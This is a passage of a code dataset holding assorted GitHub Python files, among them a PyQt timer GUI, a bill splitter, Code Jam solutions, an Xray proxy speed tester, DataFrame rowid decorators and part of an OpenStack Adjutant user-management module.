if buttonState == 'start':\n # print('start')\n # self.startTime = time.time()\n # self.seButton.setText('stop')\n # threading.Thread(target=PowerRecord.timeStep,args=(self,)).start()\n\n # # timeStep = time.clock() - self.startTime\n # elif buttonState == 'stop':\n # print('stop')\n # self.pick.append({'start':self.startTime,\n # 'stop':self.stopTime,'userID':self.userID})\n # self.saveFile()\n # self.loadFile()\n # self.plantlist()\n\n # self.stopTime = time.time()\n # self.seButton.setText('start')\n # self.timebegin = False\n # # print(timeStep)\n # beginTime = time.strftime('%H:%M:%S', time.localtime(self.beginTime) )\n\n # pdb.set_trace()\n # continueTime = 1\n # pdb.set_trace()\n # print(continueTime)\n # self.pick.append({'start:':beginTime,\n # 'stop':continueTime,'userID':self.userID,})\n\n\n\n\n # def timeStep(self):\n # threadStartTime = time.clock()\n # # self.timebegin = True\n # while self.timebegin:\n # timeStep = time.clock() - threadStartTime\n # # print(timeStep)\n # timestr = time.strftime('%H:%M:%S',time.localtime(timeStep))\n # # print(timestr)\n # self.ticker.display(timestr)\n # self.update_GUI()\n # time.sleep(1)\n # pdb.set_trace()\n # self.historyEdit.clear()\n # textstr.startTime = self.startTime\n # textstr = x['start']+':'+x['stop']+':'+x['userID']\n # print(textstr)\n # for x in range(1,self.itemShowNum):\n # pass\n # pdb.set_trace()\n # self.historyEdit.appendPlainText(textstr)\n # self.plaintlist.append(textstr)\n # if len(self.texlist) > 3:\n # return\n '''\n def beginOendTime(self):\n timeState = self.timeEdit.text()\n if self.seButton.buttonState == 'begin' and timeState != '0:00':\n #记录起始时间\n self.beginTime = time.time()\n print('beginTime:',self.beginTime)\n self.beginTimeSignal.emit(self.beginTime)\n # self.emitBeginTime()\n #设置时长\n self.editTime = self.timeEdit.time()\n self.timeStateSignal.emit(self.editTime.toPyTime())\n self.logStateSignal.emit(True)\n print('editTime:',self.editTime,'toPyTime',self.editTime.toPyTime())\n self.timebegin = True\n threading.Thread(target=self.timerStep,daemon = True).start()\n self.ledStartTime = time.clock()\n self.seButton.setText('stop')\n self.seButton.buttonState = 'stop'\n self.timeStepPause = False\n time.sleep(0.3)\n elif self.seButton.buttonState == 'stop':\n self.timebegin = False\n self.seButton.setText('begin')\n self.seButton.buttonState = 'begin'\n '''\n\n\n\n\n\n###\n#emit\n###\n # def emitBeginTime(self):\n # self.beginTime.emit(self.beginTime)\n\n\nif __name__ == '__main__':\n import sys\n\n from PyQt5.QtWidgets import QApplication\n\n app = QApplication(sys.argv)\n\n addressBook = PowerRecord()\n addressBook.show()\n\n sys.exit(app.exec_())\n","repo_name":"lidingke/photodarkening","sub_path":"view/powerrecord.py","file_name":"powerrecord.py","file_ext":"py","file_size_in_byte":17282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16454946728","text":"import random\n\n\nclass BillSplitter:\n def __init__(self):\n self.friends = {}\n self.friends_qty = None\n self.total_bill = None\n\n def invite_friends(self):\n print(\"Enter the number of friends joining (including you):\")\n self.friends_qty = int(input())\n if self.friends_qty <= 0:\n print(\"No one is joining for the party\")\n exit()\n else:\n print(\"Enter the name of every friend (including you), each on a new line:\")\n while len(self.friends) < self.friends_qty:\n friend = input()\n self.friends[friend] = 0\n # print(self.friends)\n\n def split_bill(self, total_bill):\n split_equally = round(total_bill / self.friends_qty, 2)\n for friend in self.friends:\n self.friends[friend] = split_equally\n print(self.friends)\n\n def lucky_one(self):\n print('Do you want to use the \"Who is lucky?\" feature? Write Yes/No:')\n lucky_answer = input()\n if lucky_answer == \"Yes\":\n lucky = random.choice(list(self.friends.keys()))\n print(\"{} is the lucky one!\".format(lucky))\n split_bill = round(self.total_bill / (self.friends_qty - 1), 2)\n for friend in self.friends:\n if friend == lucky:\n self.friends[friend] = 0\n else:\n self.friends[friend] = split_bill\n print(self.friends)\n else:\n print(\"No one is going to be lucky\")\n self.split_bill(self.total_bill)\n\n def main(self):\n self.invite_friends()\n try:\n print(\"Enter the total bill value:\")\n self.total_bill = int(input())\n except (TypeError, ValueError):\n print(\"Bill should be an integer value greater than 0!\")\n else:\n self.lucky_one()\n\n\nmy_bill = BillSplitter()\nmy_bill.main()","repo_name":"alendina/Bill_Splitter","sub_path":"Bill Splitter/task/with_class_exam1.py","file_name":"with_class_exam1.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11536696051","text":"frase=input(\"digite uma frase: \")\npalavra_invertida = \"\"\nn=len(frase)\n\n\nresposta = True\nfor i in range(n):\n if frase.lower()[i] == \" \":\n \"\".join(frase)\n break\n \n if frase.lower()[i]!= frase.lower()[n - i - 1]:\n resposta = False\n break\n \nif resposta:\n print(\"É palindromo\")\nelse:\n print(\"Não é palíndromo\")\n \n ","repo_name":"Gzanella1/BCC-Bacharelado-Ciencia-da-computacao","sub_path":"Algoritimos/ALG-Lista-4/GZM-Alg-04-Ex-11.py","file_name":"GZM-Alg-04-Ex-11.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30093357013","text":"from slackclient import SlackClient\nimport os\n\n\nBOT_NAME = \"report_tracker\"\n\n\nslack_client = SlackClient(os.environ.get(\"SLACK_BOT_TOKEN\"))\n\n\ndef main():\n api_call = slack_client.api_call(\"users.list\")\n if (api_call.get(\"ok\")):\n users = api_call.get(\"members\")\n for user in users:\n if \"name\" in user and user.get(\"name\") == BOT_NAME:\n print(\"Bot id for \" + user[\"name\"] + \" is \" + user[\"id\"])\n else:\n print(\"No bot with \" + BOT_NAME + \" found\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"iAmMrinal0/log_em_all","sub_path":"bot_id.py","file_name":"bot_id.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23470983331","text":"f = open('A-small-attempt1.in')\nout = open('ABF.out','w')\ni = 0\nfor line in f:\n\tif i==0:\n\t\ti = i + 1\n\t\tcontinue\n\tn = int(line)\n\tout.write('Case #' + str(i) + ': ' + str(NToNumber[n]) + '\\n')\n\ti = i + 1\n\nout.close()\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_162/342.py","file_name":"342.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18556073509","text":"import scirados\nimport numpy as np\nprint(dir(scirados))\ntest = scirados.RadosDataSet(\"TestDataSet\", \"image_cache\")\n\ntest2d = scirados.RadosDataSet(\"TestDataSet2D\", \"image_cache\")\n\ndata = np.array([123.42,42,42,3,534.5344, 432], dtype=np.float64)\ndata2d = np.array([[123.42,42,42,3,534.5344, 432], [1.2342,4.322,4.2,3,32.422, 23]], dtype=np.float64)\ndata2 = np.array([32.3,3.2], dtype=np.float64)\ndata22d = np.array([[0,0,0,0],[1,1,1,1],[2,2,2,2],[3,3,3,3]], dtype=np.float64)\n\n#print(data.dtype)\ntest.writeData(data)\n\ntest2d.writeData(data2d)\n\n\n#test.writeBox(data2, xstart=2)\nprint(data22d[1:3,0:2])\ntest2d.writeBox(data22d[1:3,0:2], xstart=2, ystart=0)\n#test.writeData(\"test\", data2)\n#print(\"here\\n\")\ntest_data = test.readData()\n#print(test_data)\nprint(test2d.readData())\n#test_data2 = test.readData(\"test2\")\nprint(test2d.readBox(xslice=slice(0,2), ystart=1))\nprint(test2d.getDims())\n#print(test.ObjectExists(\"test2\"))\n#print(test.writeBox(\"test2\", slice(0,20,2), slice(7,22), data))\n","repo_name":"LenaO/librados_science","sub_path":"rados_py/tests/testDataSet.py","file_name":"testDataSet.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39841266037","text":"import json\nimport shutil\nimport subprocess\nfrom typing import Tuple\nimport socket\nimport time\nimport requests\nimport os\n\nxray_path = \"../../../bin/xray-linux-amd64-1.8.3\"\nn_try = 1\n\ndef wait_for_port(port: int, host: str = 'localhost', timeout: float = 5.0) -> None:\n # Wait until a port starts accepting TCP connections.\n start_time = time.perf_counter()\n while True:\n try:\n with socket.create_connection((host, port), timeout=timeout):\n break\n except OSError as ex:\n time.sleep(0.01)\n if time.perf_counter() - start_time >= timeout:\n raise TimeoutError(\n f'Timeout exceeded for the port {port} on host {host} to start accepting connections.') from ex\n\n\ndef start_xray_service(config_path_dir: str, binary_path: str, timeout=5) -> Tuple[subprocess.Popen, dict]:\n # starts the proxy (v2ray/xray) service and waits for the respective port to open\n config_path = config_path_dir+\"/config.json\"\n\n with open(config_path, \"r\") as infile:\n proxy_conf = json.load(infile)\n\n proxy_listen = \"127.0.0.1\" # proxy_conf[\"inbounds\"][0][\"listen\"]\n # proxy_port = proxy_conf[\"inbounds\"][0][\"port\"] # Socks port\n proxy_port = proxy_conf[\"inbounds\"][1][\"port\"] # HTTPS port\n proxy_process = subprocess.Popen([binary_path, \"-c\", \"config.json\"],\n stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL,\n cwd=config_path_dir)\n try:\n wait_for_port(host=proxy_listen, port=proxy_port, timeout=timeout)\n except Exception as e:\n remove_dir(config_path_dir)\n proxy_process.kill()\n raise TimeoutError(str(e)) from e\n # proxies = dict(http=f\"socks5://{proxy_listen}:{proxy_port}\",https=f\"socks5://{proxy_listen}:{proxy_port}\")\n proxies = dict(http=f\"{proxy_listen}:{proxy_port}\", https=f\"{proxy_listen}:{proxy_port}\")\n\n return proxy_process, proxies\n\n\ndef download_speed_test(n_bytes: int, proxies: dict, timeout: int) -> Tuple[float, float]:\n # tests the download speed using cloudflare servers\n if proxies is None:\n raise TimeoutError(\"No Xray service available\")\n\n start_time = time.perf_counter()\n r = requests.get(url=\"https://speed.cloudflare.com/__down\",\n params={\"bytes\": n_bytes},\n timeout=timeout,\n proxies=proxies)\n total_time = time.perf_counter() - start_time\n cf_time = float(r.headers.get(\"Server-Timing\").split(\"=\")[1]) / 1000\n latency = r.elapsed.total_seconds() - cf_time\n download_time = total_time - latency\n\n mb = n_bytes * 8 / (10 ** 6)\n download_speed = mb / download_time\n\n return download_speed, latency\n\n\ndef remove_dir(directory):\n # delete the directory\n os.system(f\"rm -rf {directory}\")\n\n\ndef do_test(config_link, outbound_port):\n config_path_dir = f\"./link2json/ports/{outbound_port}\" # path of config , generated by link2json.jar\n\n if not os.path.exists(config_path_dir):\n os.makedirs(config_path_dir)\n\n v2ray_config_path = f\"{config_path_dir}/v2ray_config.json\"\n\n # copy v2ray_config.json template to the config_path_dir\n shutil.copy(\"./link2json/v2ray_config_template.json\", v2ray_config_path)\n\n min_dl_speed = 20 * 1024 # 20KBps\n max_dl_time = 3 # sec\n\n n_bytes = min_dl_speed * max_dl_time\n\n try:\n # Run the JAR file as a subprocess\n process_java = subprocess.Popen([\"java\", \"-jar\", \"../../Link2Json.jar\", config_link],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n cwd=config_path_dir)\n # Wait for the process to finish and get the output\n stdout, stderr = process_java.communicate()\n # Decode the output\n if len(stdout) != 0:\n output = stdout.decode(\"utf-8\")\n else:\n output = stderr.decode(\"utf-8\")\n if 'Empty' in output:\n remove_dir(config_path_dir)\n raise Exception(\"empty config.json generated - invalid link (url)\")\n\n xray_config_path = config_path_dir + \"/config.json\"\n with open(xray_config_path, 'r') as file:\n content = file.read()\n\n # Replace the port with ours\n new_content = content.replace('10809', str(outbound_port))\n\n with open(xray_config_path, 'w') as file:\n file.write(new_content)\n\n except Exception as e:\n remove_dir(config_path_dir)\n raise Exception(\"Link2Json has failed! \" + str(e))\n\n process_xray, proxies = start_xray_service(config_path_dir, xray_path, 3)\n\n count = 0\n Ave_speed = 0\n avg_latency = 0\n for try_idx in range(n_try):\n try:\n dl_speed, dl_latency = download_speed_test(n_bytes, proxies, 3)\n Ave_speed = Ave_speed + dl_speed\n avg_latency = avg_latency + dl_latency\n count = count + 1\n except Exception as e:\n remove_dir(config_path_dir)\n process_xray.kill()\n raise Exception(\"download timeout exceeded? -> \" + str(e))\n\n # make a request to the website\n url = os.environ.get('WEBSITE_URL', 'http://localhost')\n ip_result = None\n try:\n r = requests.get(f\"{url}/backend/app/config/ip/\", proxies=proxies, timeout=5)\n if r.status_code == 200:\n ip_result = r.json()\n except Exception as e:\n remove_dir(config_path_dir)\n process_xray.kill()\n raise Exception(f\"Failed check config server ip! {str(e)}\")\n\n process_xray.kill()\n\n if count > 0:\n Ave_speed = round(Ave_speed / count, 2)\n avg_latency = round(avg_latency / count, 2)\n print(config_link[:50]+\"...\", \" - successful\", \" DL_speed =\", Ave_speed, \"Mbps\", \" Latency =\", avg_latency, \"sec\")\n is_test_ok = True\n return is_test_ok, Ave_speed, avg_latency, ip_result\n else:\n raise Exception(\"XRay test failed! count = 0\")\n\n\ndef check_working_directory():\n current_dir = os.getcwd()\n actual_file_dir = os.path.dirname(os.path.realpath(__file__))\n if current_dir != actual_file_dir:\n os.chdir(actual_file_dir)\n\n\n# if __name__ == '__main__':\n# check_working_directory()\n#\n# do_test(\n# \"vless://fa0e6e80-7ede-4c01-b9aa-aa2f43e0afe8@web.yahoo.com:2087?encryption=none&flow=xtls-rprx-vision&security=reality&sni=sni.yahoo.com&fp=firefox&pbk=mykey&sid=myid&spx=myx&type=grpc#test2\")\n# do_test(\n# \"vmess://ew0KICAidiI6ICIyIiwNCiAgInBzIjogInRlc3QxIiwNCiAgImFkZCI6ICJ3ZWIuZ29vZ2xlLmNvbSIsDQogICJwb3J0IjogIjQ0MyIsDQogICJpZCI6ICI2MjBjNjAzMS03MDE4LTQ4ODAtOGI3Ny0wOGY4NDY5ZDlmNmQiLA0KICAiYWlkIjogIjAiLA0KICAic2N5IjogImF1dG8iLA0KICAibmV0IjogInRjcCIsDQogICJ0eXBlIjogIm5vbmUiLA0KICAiaG9zdCI6ICJnb29nbGUuY29tIiwNCiAgInBhdGgiOiAiIiwNCiAgInRscyI6ICJ0bHMiLA0KICAic25pIjogInNuaS5nb29nbGUuY29tIiwNCiAgImFscG4iOiAiaDIiLA0KICAiZnAiOiAiYW5kcm9pZCINCn0=\")\n","repo_name":"GFW-knocker/Mahsa_Server","sub_path":"xray/xray_config_tester.py","file_name":"xray_config_tester.py","file_ext":"py","file_size_in_byte":7013,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"72806740353","text":"import functools\nfrom uuid import uuid1\nimport numpy as np\n\ndef require_rowid(f):\n \"\"\" The first arg must be the table\"\"\"\n @functools.wraps(f)\n def wrapper(*args, **kwargs):\n table = args[1]\n try:\n from pandas.core.frame import DataFrame as pddf\n except (ImportError, OSError) as e:\n class pddf:\n pass\n try:\n from polars.dataframe.frame import DataFrame as pldf\n except (ImportError, OSError) as e:\n class pldf:\n pass\n try:\n from pyarrow.lib import Table as patab\n import pyarrow as pa\n except (ImportError, OSError) as e:\n class patab:\n pass\n def pddf_deleter(df, original = None):\n df.drop(\"rowid\", axis = 1, inplace = True)\n if original:\n df.rename(columns = {original: \"rowid\"}, inplace = True)\n return df\n def pldf_deleter(df, original = None):\n df = df.drop(\"rowid\")\n if original:\n df = df.rename({original: \"rowid\"})\n return df\n def numpy_deleter(df, original = None):\n df.pop(\"rowid\")\n if original:\n df[\"rowid\"] = df[original]\n df.pop(original)\n return df\n def patab_deleter(df, original):\n df = df.drop(\"rowid\")\n if original:\n newnames = df.column_names\n newnames[newnames.index(original)] = \"rowid\"\n df = df.rename_columns(newnames)\n return df\n\n def get_newname_for_rowid(l):\n i = 0\n while True:\n if f\"rowid_{i}\" not in l:\n return i\n i += 1\n if isinstance(table, pddf):\n original = None\n if 'rowid' in table.columns:\n original = f\"rowid_{get_newname_for_rowid(table.columns)}\"\n table.rename(columns = {\"rowid\": original}, inplace = True)\n table['rowid'] = table.index\n deleter = pddf_deleter\n f(*args, **kwargs)\n elif isinstance(table, pldf):\n original = None\n if 'rowid' in table.columns:\n original = f\"rowid_{get_newname_for_rowid(table.columns)}\"\n table = table.rename({\"rowid\": original})\n table = table.with_row_count(\"rowid\")\n deleter = pldf_deleter\n elif isinstance(table, dict):\n original = None\n if 'rowid' in table.keys():\n original = f\"rowid_{get_newname_for_rowid(table.keys())}\"\n table[original] = table['rowid']\n table['rowid'] = np.arange(len(table[list(table.keys())[0]]))\n deleter = numpy_deleter\n elif isinstance(table, patab):\n original = None\n if 'rowid' in table.column_names:\n original = f\"rowid_{get_newname_for_rowid(table.columns)}\"\n newnames = table.column_names\n newnames[newnames.index(\"rowid\")] = original\n table = table.rename_columns(newnames)\n table = table.append_column(\"rowid\", pa.array(np.arange(table.num_rows)))\n deleter = patab_deleter\n elif isinstance(table, str):\n original = None\n deleter = None\n else:\n raise Exception(\"Not supported type of table\")\n res = f(*args, **kwargs)\n if deleter:\n table = deleter(table, original)\n return res\n return wrapper\n","repo_name":"vlowingkloude/pyduckpgq","sub_path":"decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":3574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23543874261","text":"#!/usr/bin/env python3\n\"\"\"\nOversized Pancake Flipper problem\nfor Google Code Jam 2017\nQualification Round\n\nLink to problem description:\nhttps://code.google.com/codejam/contest/3264486/dashboard#s=p0\n\nAuthor:\n Chris Nitsas\n (nitsas)\n\nLanguage:\n Python 3(.5)\n\nDate:\n April, 2017\n\nUsage:\n python3 runme.py input_file\n\"\"\"\n\n\nimport sys, argparse, collections\n\n\nTestCase = collections.namedtuple('TestCase', ['pancakes', 'flipper_width'])\n\n\ndef parse_args():\n \"\"\"\n Parse the command line arguments and return them in a namespace.\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('input_file')\n args = parser.parse_args()\n return args\n\n\ndef read_testcase(file_):\n pancakes_str, flipper_width_str = file_.readline().split()\n return TestCase([p == '+' for p in pancakes_str], int(flipper_width_str))\n\n\ndef solve_testcase(tc):\n num_flips = 0\n for i in range(len(tc.pancakes) - tc.flipper_width + 1):\n if not tc.pancakes[i]:\n # flip\n for j in range(tc.flipper_width):\n tc.pancakes[i + j] = not tc.pancakes[i + j]\n num_flips += 1\n if False in tc.pancakes[::-1][:tc.flipper_width]:\n return 'IMPOSSIBLE'\n else:\n return num_flips\n\n\ndef main(filename):\n with open(filename, 'r', encoding='utf-8') as f:\n num_testcases = int(f.readline())\n testcases = [read_testcase(f) for i in range(num_testcases)]\n for i, tc in enumerate(testcases, start=1):\n print('Case #{}: {}'.format(i, solve_testcase(tc)))\n return 0\n\n\nif __name__ == \"__main__\":\n status = main(parse_args().input_file)\n sys.exit(status)\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/2583.py","file_name":"2583.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10463819075","text":"\"\"\"\nforward propagator\n\nUsage:\n forward_propagator.py -i INPUTS -w WEIGHTS [--a=] [--act=]\n\nOptions:\n -h, --help Show this help message\n -i INPUTS Comma separated list of inputs\n -w WEIGHTS Comma separated list of weights\n --a= The actual value\n --act= The activator function\n\"\"\"\nimport docopt\n\nactivators = {\n 'identity': lambda x: x,\n 'relu': lambda x: max(0, x),\n 'binstep': lambda x: 0 if x < 0 else 1,\n 'logistic': lambda x: 1 / (1 + math.exp(-x)),\n 'softsign': lambda x: x / (1 + abs(x)),\n 'leakyrelu': lambda x: 0.01 * x if x < 0 else x\n}\n\ndef forward_propagator(inputs, weights, actual=0, activator='relu'):\n if ((len(weights) - len(inputs)) % pow(len(inputs), 2)) != 0:\n raise Exception(\"Incorrect number of weights provided.\")\n\n try:\n activator = activators[activator]\n except KeyError:\n activator = activators['identity']\n\n dot = lambda X, Y: sum(map(lambda x, y: x * y, X, Y))\n\n weights_per_epoch = pow(len(inputs), 2)\n\n num_epochs = (len(weights) - len(inputs)) / weights_per_epoch\n node_output_weights = weights[-len(inputs):]\n\n print(\"weights per epoch={}, number of epochs={}\".format(weights_per_epoch, num_epochs))\n node_inputs = inputs\n\n for epoch in range(0, num_epochs):\n epoch_weights = weights[epoch * weights_per_epoch:(epoch + 1) * weights_per_epoch]\n node_input_weights = [epoch_weights[i:i + len(inputs)] for i in range(0, len(epoch_weights), len(inputs))]\n print(\"epoch: {}\".format(epoch))\n print(\"node inputs: {}\".format(node_inputs))\n print(\"epoch weights: {}\".format(epoch_weights))\n print(\"node input weights: {}\".format(node_input_weights))\n\n sums = [activator(dot(node_weights, node_inputs)) for node_weights in node_input_weights]\n print(\"sums: {}\".format(sums))\n\n print(\"\")\n\n node_inputs = sums\n ret = dot(node_output_weights, node_inputs)\n\n return ret - actual\n\nif __name__ == \"__main__\":\n args = docopt.docopt(__doc__)\n args['-i'] = [float(x) for x in args['-i'].split(',')]\n args['-w'] = [float(x) for x in args['-w'].split(',')]\n actual = float(args['--a']) if args['--a'] is not None else 0\n activator = args['--act'] if args['--act'] is not None else 'identity'\n print(forward_propagator(inputs=args['-i'], weights=args['-w'], actual=actual, activator=activator))\n","repo_name":"zg/fp","sub_path":"forward_propagator.py","file_name":"forward_propagator.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71926212355","text":"from confspirator import groups\nfrom confspirator import fields\n\nfrom adjutant.config import CONF\nfrom adjutant.common import user_store\nfrom adjutant.actions.v1.base import (\n UserNameAction,\n UserIdAction,\n UserMixin,\n ProjectMixin,\n)\nfrom adjutant.actions.v1 import serializers\nfrom adjutant.actions.utils import validate_steps\n\n\nclass NewUserAction(UserNameAction, ProjectMixin, UserMixin):\n \"\"\"\n Setup a new user with a role on the given project.\n Creates the user if they don't exist, otherwise\n if the username and email for the request match the\n existing one, will simply add the project role.\n \"\"\"\n\n required = [\n \"username\",\n \"email\",\n \"project_id\",\n \"roles\",\n \"inherited_roles\",\n \"domain_id\",\n ]\n\n serializer = serializers.NewUserSerializer\n\n def _validate_target_user(self):\n id_manager = user_store.IdentityManager()\n\n # check if user exists and is valid\n # this may mean we need a token.\n user = self._get_target_user()\n if not user:\n self.add_note(\n \"No user present with username '%s'. \"\n \"Need to create new user.\" % self.username\n )\n if not id_manager.can_edit_users:\n self.add_note(\n \"Identity backend does not support user editing, \"\n \"cannot create new user.\"\n )\n return False\n self.action.need_token = True\n # add to cache to use in template\n self.action.task.cache[\"user_state\"] = \"default\"\n self.set_token_fields([\"password\"])\n return True\n if (\n not CONF.identity.username_is_email\n and getattr(user, \"email\", None) != self.email\n ):\n self.add_note(\n \"Found matching username, but email did not match. \"\n \"Reporting as invalid.\"\n )\n return False\n\n if not user.enabled:\n self.add_note(\n \"Existing disabled user '%s' with matching email.\" % self.email\n )\n if not id_manager.can_edit_users:\n self.add_note(\n \"Identity backend does not support user editing, \"\n \"cannot renable user.\"\n )\n return False\n self.action.need_token = True\n self.action.state = \"disabled\"\n # add to cache to use in template\n self.action.task.cache[\"user_state\"] = \"disabled\"\n # as they are disabled we'll reset their password\n self.set_token_fields([\"password\"])\n return True\n\n # role_validation\n roles = id_manager.get_roles(user, self.project_id)\n role_names = {role.name for role in roles}\n missing = set(self.roles) - role_names\n if not missing:\n self.action.need_token = False\n self.action.state = \"complete\"\n self.add_note(\"Existing user already has roles.\")\n else:\n self.roles = list(missing)\n self.action.need_token = True\n self.set_token_fields([\"confirm\"])\n self.action.state = \"existing\"\n # add to cache to use in template\n self.action.task.cache[\"user_state\"] = \"existing\"\n self.add_note(\"Existing user with matching email missing roles.\")\n\n return True\n\n def _validate(self):\n self.action.valid = validate_steps(\n [\n self._validate_role_permissions,\n self._validate_keystone_user_domain_id,\n self._validate_keystone_user_project_id,\n self._validate_domain_id,\n self._validate_project_id,\n self._validate_target_user,\n ]\n )\n self.action.save()\n\n def _prepare(self):\n self._validate()\n self.set_auto_approve()\n\n def _approve(self):\n self._validate()\n\n def _submit(self, token_data, keystone_user=None):\n self._validate()\n\n if not self.valid:\n return\n\n if self.action.state == \"default\":\n # default action: Create a new user in the tenant and add roles\n user = self.create_user(token_data[\"password\"])\n self.grant_roles(user, self.roles, self.project_id)\n self.grant_roles(user, self.inherited_roles, self.project_id, True)\n\n self.add_note(\n \"User %s has been created, with roles %s in project %s.\"\n % (self.username, self.roles, self.project_id)\n )\n\n elif self.action.state == \"disabled\":\n # first re-enable user\n user = self.find_user()\n self.enable_user(user)\n self.grant_roles(user, self.roles, self.project_id)\n self.grant_roles(user, self.inherited_roles, self.project_id, True)\n self.update_password(token_data[\"password\"])\n\n self.add_note(\"User %s password has been changed.\" % self.username)\n\n self.add_note(\n \"Existing user %s has been re-enabled and given roles %s\"\n \" in project %s.\" % (self.username, self.roles, self.project_id)\n )\n\n elif self.action.state == \"existing\":\n # Existing action: only add roles.\n user = self.find_user()\n self.grant_roles(user, self.roles, self.project_id)\n self.grant_roles(user, self.inherited_roles, self.project_id, True)\n\n self.add_note(\n \"Existing user %s has been given roles %s in project %s.\"\n % (self.username, self.roles, self.project_id)\n )\n elif self.action.state == \"complete\":\n # complete action: nothing to do.\n self.add_note(\n \"Existing user %s already had roles %s in project %s.\"\n % (self.username, self.roles, self.project_id)\n )\n\n\nclass ResetUserPasswordAction(UserNameAction, UserMixin):\n \"\"\"\n Simple action to reset a password for a given user.\n \"\"\"\n\n required = [\"domain_name\", \"username\", \"email\"]\n\n serializer = serializers.ResetUserPasswordSerializer\n\n config_group = groups.DynamicNameConfigGroup(\n children=[\n fields.ListConfig(\n \"blacklisted_roles\",\n help_text=\"Users with these roles cannot reset their passwords.\",\n default=[],\n sample_default=[\"admin\"],\n ),\n ],\n )\n\n def __init__(self, *args, **kwargs):\n super(ResetUserPasswordAction, self).__init__(*args, **kwargs)\n\n def _validate_user_roles(self):\n id_manager = user_store.IdentityManager()\n\n all_roles = id_manager.get_all_roles(self.user)\n\n user_roles = []\n for roles in all_roles.values():\n user_roles.extend(role.name for role in roles)\n\n if set(self.config.blacklisted_roles) & set(user_roles):\n self.add_note(\"Cannot reset users with blacklisted roles.\")\n return False\n\n return True\n\n def _validate_user_email(self):\n # NOTE(adriant): We only need to check the USERNAME_IS_EMAIL=False\n # case since '_validate_username_exists' will ensure the True case\n if not CONF.identity.username_is_email:\n if self.user and (\n getattr(self.user, \"email\", None).lower() != self.email.lower()\n ):\n self.add_note(\"Existing user with non-matching email.\")\n return False\n\n self.action.need_token = True\n self.set_token_fields([\"password\"])\n self.add_note(\"Existing user with matching email.\")\n return True\n\n def _validate(self):\n # Here, the order of validation matters\n # as each one adds new class variables\n self.action.valid = validate_steps(\n [\n self._validate_domain_name,\n self._validate_username_exists,\n self._validate_user_roles,\n self._validate_user_email,\n ]\n )\n self.action.save()\n\n def _prepare(self):\n self._validate()\n self.set_auto_approve()\n\n def _approve(self):\n self._validate()\n\n def _submit(self, token_data, keystone_user=None):\n self._validate()\n\n if not self.valid:\n return\n\n self.update_password(token_data[\"password\"])\n self.add_note(\"User %s password has been changed.\" % self.username)\n\n\nclass EditUserRolesAction(UserIdAction, ProjectMixin, UserMixin):\n \"\"\"\n A class for adding or removing roles\n on a user for the given project.\n \"\"\"\n\n required = [\"project_id\", \"user_id\", \"roles\", \"inherited_roles\", \"remove\"]\n\n serializer = serializers.EditUserRolesSerializer\n\n def _validate_target_user(self):\n # Get target user\n user = self._get_target_user()\n if not user:\n self.add_note(\"No user present with user_id\")\n return False\n return True\n\n def _validate_user_roles(self):\n id_manager = user_store.IdentityManager()\n user = self._get_target_user()\n project = id_manager.get_project(self.project_id)\n # user roles\n current_roles = id_manager.get_roles(user, project)\n current_inherited_roles = id_manager.get_roles(user, project, inherited=True)\n current_roles = {role.name for role in current_roles}\n current_inherited_roles = {role.name for role in current_inherited_roles}\n if self.remove:\n remaining = set(current_roles) & set(self.roles)\n remaining_inherited = set(current_inherited_roles) & set(\n self.inherited_roles\n )\n if not remaining and not remaining_inherited:\n self.action.state = \"complete\"\n self.add_note(\"User doesn't have roles to remove.\")\n else:\n self.roles = list(remaining)\n self.inherited_roles = list(remaining_inherited)\n self.add_note(\"User has roles to remove.\")\n else:\n missing = set(self.roles) - set(current_roles)\n missing_inherited = set(self.inherited_roles) - set(current_inherited_roles)\n if not missing and not missing_inherited:\n self.action.state = \"complete\"\n self.add_note(\"User already has roles.\")\n else:\n self.roles = list(missing)\n self.inherited_roles = list(missing_inherited)\n self.add_note(\"User missing roles.\")\n # All paths are valid here\n # We've just set state and roles that need to be changed.\n return True\n\n def _validate_role_permissions(self):\n id_manager = user_store.IdentityManager()\n\n current_user_roles = id_manager.get_roles(\n project=self.project_id, user=self.user_id\n )\n current_user_roles = [role.name for role in current_user_roles]\n\n current_roles_manageable = self.are_roles_manageable(\n self.action.task.keystone_user[\"roles\"], current_user_roles\n )\n\n all_roles = set()\n all_roles.update(self.roles)\n all_roles.update(self.inherited_roles)\n new_roles_manageable = self.are_roles_manageable(\n self.action.task.keystone_user[\"roles\"], all_roles\n )\n\n if new_roles_manageable and current_roles_manageable:\n self.add_note(\"All user roles are manageable.\")\n return True\n self.add_note(\"Not all user roles are manageable.\")\n return False\n\n def _validate(self):\n self.action.valid = validate_steps(\n [\n self._validate_keystone_user_project_id,\n self._validate_role_permissions,\n self._validate_project_id,\n self._validate_target_user,\n self._validate_user_roles,\n ]\n )\n self.action.save()\n\n def _prepare(self):\n self._validate()\n self.set_auto_approve()\n\n def _approve(self):\n self._validate()\n\n def 